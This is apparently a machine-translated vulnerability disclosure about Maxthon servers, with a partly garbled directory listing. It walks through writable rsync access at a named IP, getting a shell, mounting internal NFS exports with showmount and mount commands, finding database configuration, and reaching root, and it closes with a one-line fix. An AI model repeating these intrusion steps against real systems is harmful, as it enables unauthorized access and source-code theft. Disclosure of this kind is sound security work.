Ao you's internal network is not completely roaming (a large number of internal and external network source code can be leaked)

Ao you's internal network is not completely roaming (a large number of internal and external network source code can be leaked)

I was wondering if I could prove that I had access to the data of the proud game users. The Administrator found that I only had access to the bbs users.

Rsync unauthorized access

Writable
 

Rsync 60.28.210.24: I. mx/drwxrwxr-x 8192 19:10:44. -rw-r -- 6036 13:30:47 build.txt-rw-r -- 31 19:10:23 conf. php-rw-r -- 1406 2013/10/21 13:30:49 favicon. ico-rw-r -- 7166 2014/01/13 15:40:28 feedback.htm-rw-r -- 55790 2014/01/13 15:40:28 index.htm-rw-r -- 132 13:31:34 index.so.htm-rw-r -- r -- 137 13:31:34 index.v3.html rwxrwxrwx 31 20 14/02/20 17:52:51 key-rw-r -- 30 2013/10/21 13:31:37 test. php-rw-r -- 214 2013/05/30 15:00:17 ??? ν ???. Url-rw-r -- 214 17:35:44 ?? \ #2022 ?????? #212 ?? \ #227 ￥. url-rw-r -- 214 13:31:39? #202? You? #212? #227 ?. 23:38:53 branchdrwxr-xr-x 8192 running 23:38:55 chajiandrwxr-xr-x 8192 running 16:14:21 cssdrwxr-x 8192 15:59:24 datadrwxr-xr-x 8192 11:34:51 datadrwxr-xr-x 8192 14:46:07 decent_htmldrwxr-xr-x 8192 23:43:03 do_not_deletedrwxr-xr-x 8192 19:17:48 8192 17:36:03 I. maxthon. cndrwxr-xr-x 8192 23:42:36 I. mx_updatedrwxr-xr-x 8192 14:46:08 I. 10:52:17 imagesdrwxr-xr-x 8192 running 15:59:24 jsdrwxr-xr-x 8192 running 17:38:46 macdrwxr-xr-x 8192 running 15:31:19 minidrwxr-xr-x 8192 14:46:20 sounddrwxr-xr- x 8192 18:05:43 testdrwxr-xr-x 8192 2013/05/20 18:05:43 tuandrwxr-xr-x 8192 18:05:43 am-xr-x 8192 18:05:43 am-xr-x 8192 18:05:43 am-xr-x 8192 am-x 18:05:43 v3betadrwxr-xr-x 8192 19:08:28 widget

These files are not found on the web. I. mx assumes that they are I .maxthon.cn.

Ping I .maxthon.cn and find that the ip address is incorrect.

Decisively bind the host to I .maxthon.cn 60.28.210.24

The current directory file getshell is successfully accessed.
 

 

Analysis found

Glusterfs #192.168.0.166:/other

504G 160G 320G 34%/mnt/nfs

Nfs mount directory

A large number of source code leaks
 

 

[/]$ showmount -e 192.168.0.166Export list for 192.168.0.166:/other */bbs   *

We found that there is still a bbs directory under 166.
 

/]$ uname -aLinux cms13393 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64 x86_64 x86_64 GNU/Linux

Privilege Escalation due to low kernel version on the local machine
 

Nfs mounting

mount -t nfs 192.168.0.166:/bbs /tmp/nfs

 

Bbs.maxthon.cn is successfully mounted to the Forum.

View Database Configuration connectable
 

The Administrator is checking the log and stops the test submission.

root     28678  0.0  0.0  58896   536 pts/0    S+   21:50   0:00 tail -f mx.13393/access_20141223.logroot     28703  0.0  0.0  88936  3252 ?        Ss   21:50   0:00 sshd: root [priv]sshd     28704  0.0  0.0  64096  1460 ?        S    21:50   0:00 sshd: root [net] root     28712  0.0  0.0  10456   872 ?        R    21:50   0:00 ps -auxroot     30487  0.0  0.0 102004   916 ?        S    Feb09   0:00 crondroot     30488  0.0  0.0   8696   828 ?        Ss   Feb09   0:00 /bin/bash -c /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php > /dev/null 2>&1root     30511  0.0  0.1  91052  4448 ?        S    Feb09   0:03 /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.phpsh-3.2# whosongqi   pts/0        Dec 23 21:42 (10.0.8.249)skyyuan  pts/1        Dec 23 21:44 (10.0.8.249)

 

Solution:

Enhanced Filtering